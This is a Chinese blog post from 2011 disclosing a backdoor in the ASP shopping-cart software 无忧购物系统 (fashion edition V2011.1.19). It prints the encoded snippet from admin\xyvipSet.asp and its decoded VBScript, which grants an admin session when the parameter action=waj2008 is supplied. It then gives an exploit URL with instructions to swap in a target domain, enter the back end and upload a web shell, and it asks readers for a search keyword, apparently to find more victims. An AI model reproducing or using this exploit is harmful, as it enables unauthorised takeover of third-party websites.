无忧购物系统ASP时尚版存在后门

2011, February 6, 3:08 PM. 原创笔记
Submitted by admin

FROM http://www.st999.cn/blog 

by  流浪的风

程序:无忧购物系统ASP时尚版

漏洞:存在后门,可直接登录拿shell,这后门不知道是本来就有还是另外别人添加的,以前的版本有没有这后门,我倒是没注意了

下载地址:以下两个地址下载的都有后门存在,其他网站的就没有看了

http://down.admin5.com/asp/3090.html  

http://www.onlinedown.net/soft/85106.htm

后门存在文件:admin\xyvipSet.asp

前些天没事干,刚好看到"无忧购物系统ASP时尚版 V2011.1.19",这个版本貌似是新出来的,以前的版本我有看过,漏洞不少,这个版本呢?

刚好今天有时间,就下载过来看了下,没想到漏洞还没找到,后门倒是发现了一个,晕了,漏洞不找也罢,这么大的后门存在,还有什么好找的。。。

在xyvipSet.asp文件中,有一处地方加密了,我就奇怪了,整个程序都没加密,就这地方加密了,有什么奥妙?

“#@~^iQAAAA==@#@&kW,D;E/DcJmmOkKxEb{Jhm% Z!%r~Otx@#@&d+ddbWU`rCNskUE*'JACN T!RE@#@&d/kkW `rWVmoE#{F@#@&M+/aGxk+R"n[kM+1Y~JrU9+aRmdwr@#@&n NPrW@#@&pCYAAA==^#~@”

解密了一下,明文出来了

if request("action")="waj2008" then
session("admin")="waj2008"
session("flag")=1
response.Redirect "index.asp"
end if

汗,好嚣张的后门啊

 

利用方式:http://www.st999.cn/admin/xyvipset.asp?action=waj2008

www.st999.cn替换成你的目标网站即可

进入后台的话,利用上传就可以拿shell了。

谁能给我个比较强大的关键字?

Tags: 无忧

« 上一篇 | 下一篇 »

只显示10条记录相关文章
无忧购物系统ASP通用版 V2010.9.17 ---- 上传漏洞 (浏览: 6592, 评论: 0)
无忧购物系统ASP时尚版上传漏洞 (浏览: 6624, 评论: 0)
无忧购物时尚ASP版 oday (浏览: 8232, 评论: 0)
无忧购物系统oday发布 (浏览: 5308, 评论: 0)
无忧购物系统SQL注入漏洞 (浏览: 5775, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):